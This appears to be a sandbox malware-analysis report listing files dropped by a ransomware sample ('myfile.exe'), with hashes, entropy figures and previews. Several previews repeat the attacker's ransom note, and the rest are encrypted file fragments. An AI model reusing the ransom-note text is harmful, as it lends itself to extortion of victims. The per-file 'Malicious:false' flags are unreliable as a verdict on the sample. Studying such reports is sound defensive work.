                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.850610975205844
                                                              Encrypted:false
                                                              SSDEEP:24:h2kDrtLzMVEtQ85pKl267OU9U744F3IaB0fK/nrMMjHj9:okZzdq8XKZLzm3MoHB
                                                              MD5:9EA8EB0782A56ECFFD707E42B97704F0
                                                              SHA1:E081754148B179411F897D497EA7009BFC0B8E19
                                                              SHA-256:2D00661235EF0563D33D929048FCF30477A054780A2248BDD3837BDAD9382EB5
                                                              SHA-512:57C7AE980CA8A31524318E15A77CC497FB18C37587CCAB0F9D3035325F28729D70830332F5FF47EBB4F787E6E66A883DF3C862EE23E14A0773308F6347692B4D
                                                              Malicious:false
                                                              Preview:....G+%>9rw...~.........v.......Q.2r.^(...=eg.m.G.....\....~0^....=..u.W..q..B.'..=...Z.H.0..2...4.5$Pv..]z..g{..r<Oh.K.d........aL....Q..u...P.V$..!..p..#z....$.....3.$.j+..m....m7V=keiWb.R....:|b..t$..l|7.%....b..x0L.R.G.1.....y8..d..M.:_..B....T.....=:*z!.]Bc..C.K#.Y....p.U9.(x..n.^..C.....\.`.........Z.3.*.\.*.......#..4.q.S_...m/..iX.;@`~Y..[p.+[@ay..GE:.x?.k....u ....E..p.]}".+.........i@.,i...%wGS87.:...{..9..y>..ve..\..vQ.1.r[..c........\.."...)V.M#.....B..c..a..,..{~...... &...(.fc.....]......R.].-z7.........K..<...S../.A.A7..`...!2.V...H...*5....VV.).(>.......p*:w.g....{.Y.B.a(..."........e....td[....Q.x[.DE....w.I..6.C.^Z5.y.sUJ..7z7..xh......U.........R..s.2...7@..x=..&`.5$..&`H..@z..gg.M.uF.....Qyg....*h..W.~y......+LP.+C...#.....>..7......ab...*X...;..=...o...4^}k...m.x.. r...<.L;..R......$6.Q.bL..O...'.[N..B...].J...B..q..`(....2Zwt..v.8....e...,..<;..[..&.7....L.i....q.R..7+..R..V..4!..d.v..N...X..a.......`.<...1...uLJj
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.841948720804307
                                                              Encrypted:false
                                                              SSDEEP:24:4pzlCywaTmNhgr8tnviBmUKknibhifD4bL40hnrMMjcY:SlCErQtnv4mYraMob
                                                              MD5:8483DA44AC224B5B71984D86C4D738BB
                                                              SHA1:4627C6620C49547A79E054AF4F616080557A14CD
                                                              SHA-256:9DB216CDF82D88BB67181801F0DD780834E784BA1E5651F6315C772BB849627A
                                                              SHA-512:E14A7AAB2CEDA83AD1EC4FD1CD2CC84C38B06507D2887C3108E7A651D5A6B44529E4623D35D72D7300821DAA66BF1C1DA6FFB9B11260111EB3EEB67C4F6D309E
                                                              Malicious:false
                                                              Preview:#..|G........V=q.".....T{..D...NF..a..=.j.b........kv >..4...m.e....m.@i.nH. .X.?!....\&F.7...+.4?...M.#.3.......y.Q.l/....gU.L....G..._}u.G..Q.'.)...)......5z-.L.^.oV..u8...,..i..A..j.2..rQO.. ...%..nIU.[Tp[,;.0...A...^...>..h!6.{`..&a.).d..L_...n....v.;r...?..A.s...#./q&."..."@.|.T.%.`.x...3.E.......GLK.}/.&+4m.9..,.0z)=.rm.9...7.l.X.2.M..\g..L....k.{qb..1...D..Vz9w.......+..O..q.}....^gOS..kM..<.....g.....3..]i.^........=..!.&[..b.2...T...Q.0~...5....8+....7QC....'P.q_.6..*s....b..?...@."<.#...dR*/A..o]Z.g.iD.Ju{1<..Q..3p.CK....vi.t#.......[Y.?....4.:gaPV."..o.h...h-{..o.....z....E]}.\....<.I.6Hc..Q...+.K...>z.OB...3.wq..z...$...<.'"....=]...9.V.hH...F..@..k*2>3....4v.'..B.^.WV...,...K..8..N.f/...86;.+^qq....#....e..Umr#....G.x.0 .t....2.......#..C..]R.!g...c....oA.W.h.c..0 ...N.*O.....r.............zK.....ywwdqc.aW.W....X......&........oG...O..d.h4f'+k....#7SR.g.@......h....<$...|.o$.?..{N...wH..p".a......k..3...[...T.0......
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.876356375858296
                                                              Encrypted:false
                                                              SSDEEP:24:t7I6rHoW6Fjr+wsjemq/xKNzi+7OuwbwwdaeFnrMMjRSx:RdHomwsdq/wNzRbYaQMoMx
                                                              MD5:3FCCC6D6539B294B9D800B105572D741
                                                              SHA1:B17E5B4795114400F78274CA19DC411D66F89E96
                                                              SHA-256:6E464352F5D5A3F0B4D233E588D2EE78555532E7753D16F67EF539B280BFFF4E
                                                              SHA-512:535CAC42E6BA30EBE059A921992546BE3F35A8BDE9EC29CD1D48E02D4E946F9DC974446332DDCC20345E22E6FB030DF0501499F8F270A3AD1C8F512E4B224B35
                                                              Malicious:false
                                                              Preview:...x..;..T.!...(.c.E.....[..ib....\.f.....W..&.*...c.6.>...?%..G@mz..._.~R...D..<:.!...Y...,..g...3..O.dL.=..:.."b...E0..+pf.....t...(a|J..k5(...w.5lG>.l."=.@...`..E..c~.b.1./...c...bI....3....tp.!,.>Q[.s...*....e............:C.|!.L}...O'|../..so...c.>WD2..%!.....7..3!..v...cC..1~......q[.:....}........ZM^...d$...*...q. ...B.A..i!g.HC...V...."........|Zn..:Q|.......w..m..DK2Mz.\..@../..[..s.D..N.*...i].G.....8.t..w.4.0....P.{.."4.E.^.&......1...~..{X.S./j;..]....H.....8.R.d..f.(. s..h...?-....7_e......V[.4v.....xf...8jNH.yBC'NG..%......3.N.O...`...H..M...P..K...e.+=l!.:....S..#.B.I.>7.-.Z.)Z...|...(..K..0..U{.h}M.4$}...R........n...:..S|c;. )h.0e.'q.q..xK.;.s.6. ..IQ...s6jG...J...B.c ..P./I.....J.1e[P4m......m..).i...=.....&...3..sPX.d.^-.y,?.^"F..5 ...........E...L..k.w.D.9.y..S.U.......#..x.PN.m...;..!......N..G..b..Qr..R._...2...D.....K....j2b...m......Y.-)$.._.#<[.t...4..<......2j.....r..9`...vT.......Fyd....57^.._.6tW..k.j1Yo..q....u....!@.o
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.844378598244397
                                                              Encrypted:false
                                                              SSDEEP:24:FAtZ/cfHaIjQ9V9+jMsXsGeh4/bVFzKPREgnrMMje6zi:Fm/N2Gb+jMuJembVFzKPRE+Mo5zi
                                                              MD5:01D49D08F0F7B2F8E187A0BD0FC14E98
                                                              SHA1:516BAF5448D8C167D204382C22D846E43DFDE539
                                                              SHA-256:B703500F8DF48AA773E5086574833878131CFF57E33359A4281084BE1E4D75B4
                                                              SHA-512:B783F9B14820ADD7C60D9140870DFB50BA560BF50B74FF0514943BC91752004146FE80C76BA5C4AAF5D9E91C02EBAD8EEF2AA74AB348087A54A28E80367033D0
                                                              Malicious:false
                                                              Preview:o:..!."...'Nw.u..Z.....v..C...1+8....(....8/4k.h...{O...B<oS.....l.).S ...C5VF. :.....??,..........7..>..~....+Q* 2k.O..Q...f..3u~.D....To......@.....1.H>.Nz-...T...l.Oq..!..u..H..P.........kU.....q......b6%[.........V#GM.c'........}!{....1...k^._9E.}p....S..1.5...<...5WZ..z.^..(.J...../.+j}X.....NPj./.0......&...:3.C.........+.M.3.%=.N.EQ4./.H.2..CK.Q..V.n..v......[....1.H$...)....o.......1g|...T.....H[...#!U..o........QH=... ..K"L.1P.w...S.q \Mj.4..od..5;.4.I...KR....u*.8. by..... .?a0...u..C6..W......Z7..$.`.f............/.]..).l+.6.l.Z.......f...j..U..#....1...>..6.D....%.Vl..n..d.....S.x....=.k.'.B`.`.J.4.......BoV.Q..O.[..........S..Wq.....}...?]R...n...`..i..%.t...\n..\.N...Hk.#...].]..g.V..$.PX......S..t_.p....rj.......7'.k....<..6.?....m..q...GA,.....M~..@N..c...........ae..(.:..3....f[.rI-....\p.r...q}........x.....z2...&..9..>..... .L......\..xXd........B+..z../..D..1a......W........_........rn.<o...<..E=.D:.....x|F.K8.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.854400740010516
                                                              Encrypted:false
                                                              SSDEEP:24:Q1ijMsOxQWr3q5ycoaggErHq7ZcKsUilF1QX5nrMMjRR1h:WuMsOzqoq3tuDF4xMoRvh
                                                              MD5:905C12C6F15295C98CD6A7A7E5D839CB
                                                              SHA1:7554A001731A5F28F99BE67EAE2CCA4902EC8BAB
                                                              SHA-256:6E53C6A9175C9CB3BE796DEB56ECCB50A7A1165A5BABA931C69D9D60B9078F62
                                                              SHA-512:70DBD2A5138EC599DA54CFCB564F9E6AD0732D9AFB643A6657C236B6916EA160752732DB15DA0487BC29A97692D6AFC0B8F8641AE84C8432509D722DA4B6B1A5
                                                              Malicious:false
                                                              Preview:o.o......%a..K..u.*.kD..s.C...f..d....3...a..VF5.t.n...TZ.w....y...3..~.a......?.C....H..?.".A........*...M..n.'..{@./gz...D.`.R.b...}+.0z.\a...(....:x`.m..&.....HH..I..L3..S.?. .`...8O[....../.[....i..m".hH..s...v..N.EI.UQ..x.m....O,.m+......._d.../.,w.n......[r.......J.wY.AiG*.B...ws.....W.........t9......C,..KY..........d...=#.T....K...}..r....]l...hu.-..aN..]..#..y..Gs.2......x?.:.....' j....J....2.i.*.JH...BnO.z.Y..d.!..#gt.....;.....{..\X..)n....X*......BV.J.~....}.o.#.....~._..._...>L.lsy5=..a..F......x.........X...Xi...{S-.Z..J......,..3HR......KyK*Y..y....MH.pC.N.r......YY\D.......# 2..0..'@88.>.j..#.R>2..>..v..ni.|.u.. .;#.(..=.......;*R.7.`(..kg0N".......v\..p...B4...i..E.y.Fa;..5+...;......rg_+'..?}...%v9....o;.....>....P.5\S...w.B.......9Y2...T.dQ&l#..W..Et..Ac....(...SU]..(q.W.u'.1.}*..O.>m'b...$...:.j.O.=..h..T.E.>..s..@.U.C..q.>..w...U..#.!)...2.,q..I...C......O.52..r."j....D#.jL#......c..9l/2..r.`....R......!...z..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8663219075798985
                                                              Encrypted:false
                                                              SSDEEP:24:c9PH+idWX3FC2duYPiss5IjzhCR7/ZSz2jDwCJnrMMjbF/sy:csiI4LY+5ohuPTMoJv
                                                              MD5:FF678F55DA9B2552EB52B22E490B9218
                                                              SHA1:D7AC2F3EBD4D47697A39FB928B3A17773615451C
                                                              SHA-256:16DDA854BA1E7EBAF03DCBECBA65DDF45F02803659CE7E0A70EADC8DB1F8DD9A
                                                              SHA-512:129A20FD0B4FD685B4CECB6C0810FDC830A8A235180CFBCF246E1BA0C4B000DE704F5E7EA2998B1319EE82C1DF31388AFDA4224A683335A5C403EC8DC813794D
                                                              Malicious:false
                                                              Preview::I_Q.T{!....B...3.Q...I-.l.U.N....,......V'...Q....F...."C....B.G..Wv...z..q...?.GC.:\-t..=8..H2P....Y..KG...w..u.5....r.J....]...g/K.^.x..p"O...~:..V4..*..m.....+.p.....o.x....t7.\y<.U.q..H....z~Y...^.........Z.h.#&]./...W...+`W+0N..@..~4...l(.a...j..D.k</..M@qH....2.8.#.!r.U.|......*...w./.R.,...rh...R.c...zq...k.....1..g.rf..T...33^......G.;~......).:Z7.......#.S$..]..|.5}v.C.D.d./.R.A.....M......RH......~..I..ER.JQ.}....t.#...P..u...%:e.y..>\..{@.t......c~Kad.9v......9..UW..#W1..F....*v..-.......t.N.F'hXd.yg........j..... &...7;+.....&.....K..1...8Z.t5q.[...f.]k.-..I..P.r.F'...rM94o%.D..as*...(>8I.]...d...}b.#..6."x..~m.G.c.a eO.Sh..zm.Z&..R)e.o.y<..]..Y.-.....:K..@.{.`.H..GP....8.FH...N.h..A......,{.9.Vo...\.<.2...IA...D..!...T.....!.W..L..J;a.%........{....|$...\...oU._.H..K.1.Oa..X.$.?.......LB..XB>...........@........;Q....6.t..x....hR.....O..pI$.U.5.....t....7.K.F1../....Gp.Pe.5..H....nT...!..ZB.{..h.h.w*..8...nE..B.j..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8385070950898355
                                                              Encrypted:false
                                                              SSDEEP:24:6SwIJ4/PD8RgKCqXd5Py304RKUVmGF03SkR6yDsBnXUnrMMjzQVj:6SwzD8mKHNgh5FMS9+sBKMozQN
                                                              MD5:6DCFED4835F185CEFCA50FE8F39F2478
                                                              SHA1:90E430E1084ADEEBC6C0E6EEFC2DA115A9F6249D
                                                              SHA-256:757B82559CF671C189B9C51768B56C6DC91D8CCAFE2DDAF1E7F1E84507AA7D4C
                                                              SHA-512:EFBA86ABD126F5F609B840D26B21B84EAB99CE789BDE9CF6E4821B5C1B5D827E32616BB741A660AE0F5D05C6EB44D961F853678938DBEFFFC58D5B802C19F32D
                                                              Malicious:false
                                                              Preview:,...c.y[.....H.1(x.(.d.s.e.0...q..{I.>.......XV.f.A1C..W.i.a.i]f.#..5.c..<....]Q............5...H.,......Y8..H\%.B...sU....6..ti.S.n....C.......:.'o.......[.99u.O.x....u..z-....<....:.w.Z[...J.....7a=t...U=....B.....e{...G..L..H...%......gp.........5....*.....pwe.lT..K/....\.I.`u.^.<..#2.{|7fZ..F......I&..7!.}.......6....E.^..mQ....2.m[, =RqS...0FE....Nq..X....A1.h.W.....^.;..g*g6.K}X.r.....#...........&.7R...X..sD:C.|)../...9..X....nK.9..H..V.*.....n.*........6.m.$..u..9z$;Z..;............7..'a.($...s.c......*.OW.pm..'s.....P...?M5......b!~.......A..9ZlLep..a..r.y.j.e....j.Y...S.....B.:.9.;..t....h[.W.`..w.4....x.n....j....g.I...t...U...0..I\oK.....I+..=y..u.W.bm.dw.....mW.70.2.^....#.EC...N...E.....~..@..4l..}.}..:.F..m.....s..kY.jZ.D/_.....Ut.7..n...!..N...E.u..OJ.y.@.t.cx...*.H..yBl..QG.....+.."...kN...k0..-..q...[..#..f..snv.....*@.t..%.m....J...x.C.<....e@}........<t+ie(.W..NP..BKuuHu.W=.m)....V.`..8.....{.r.....i....!....s.vS..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8323522168339625
                                                              Encrypted:false
                                                              SSDEEP:24:nStetjO3XI47+id5VkMpje3c4F2Ywd+ZvRwbynrMMje:1jO3XIEhVkOjxgwb0Moe
                                                              MD5:DFA231B4C42E6BE46EA4D7466DCB6F4E
                                                              SHA1:6E25DC02966E61D39DDA6F42450466C2D772CC13
                                                              SHA-256:51FFB71532997E38D717669B3AE08B654BEB97580543E181747203438AD2B15F
                                                              SHA-512:D5AC93D4265226257D25FF132C2C1D66D4CAE6BEA18BA7BAC998133C6494DF595312EF00120D9CCE3D5EA373B81341491742B253DA0AF1666533D1872BB5061C
                                                              Malicious:false
                                                              Preview:'.mu.^5.M)obI.......-..}..5.....Ev.@W..IR.....\..*/..}.....hXj.p.\..*X).?X....9...e..J*!sd.....'...C).O.......j.i..{....We..b.Mt.......u.b.......:..!<L..R..8.0*..x.......&H,O.rE....2...[.j?.y.F.....6..z........~g.'.t..J.)g.:.O.*..D..$.........:....O.1.t...N~+.old?.M#P..T_-.+"...r._."(.}.{..^.M.k.8....1ju.g...DI%)w.M..(....t.<5.S.Fx...hP9H=]<{.....,*u.b(...w/...V..6. ......`.....+s..Y..i....c'4Z..3U.....L^>..Ec....~.t..0..w.A_.03.0...|S.../@#e...W.B.Q#...Y.hz......jm.#.+..L..i.Iar.|..h.A.a....Q+s..I}d.(...>.@WI..Y.......#..=0kH....=@._1$.!?../.\....N.3.JPR..(J....){......W&.....(.vx....h..a......-0t..D..{2..c.....s..$.....B.|....g'.P5..].2...e;.h....z.....".,......Y.LQ...k.2...Q....xse...\V..w..Q.x.o......B.4@.JM&.,..M..........Ey..a.V.2H..E.9R$0.~ .x..*.G...mGz[.8.0..*...(.a]....m.c.....s.:u.9mf...F.-.......~t...T.\.A.\..._.u.dWQ..b@.,...}.)8.@9..!..O}|.%/..1.<.8....d..=..mK........Ha....~....R.E... ,.6......7.j......s|c....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.840212115888584
                                                              Encrypted:false
                                                              SSDEEP:24:SbUY73wQaHME5rIi1Xo1Ujq5GBQUycIoI4wMG1AlxnGISnnrMMjt:SnTwQaRIi1Y18q5PCzGtAncMot
                                                              MD5:49AF187B783399D828DD44B0AFCA4B2E
                                                              SHA1:87ADF414BBA283A102A8E70AF8E37F7FC274354D
                                                              SHA-256:E956AFB71F749276EE78C59033F0F6C8815ECE9A68AA1FA13C0CE7E48D1664EC
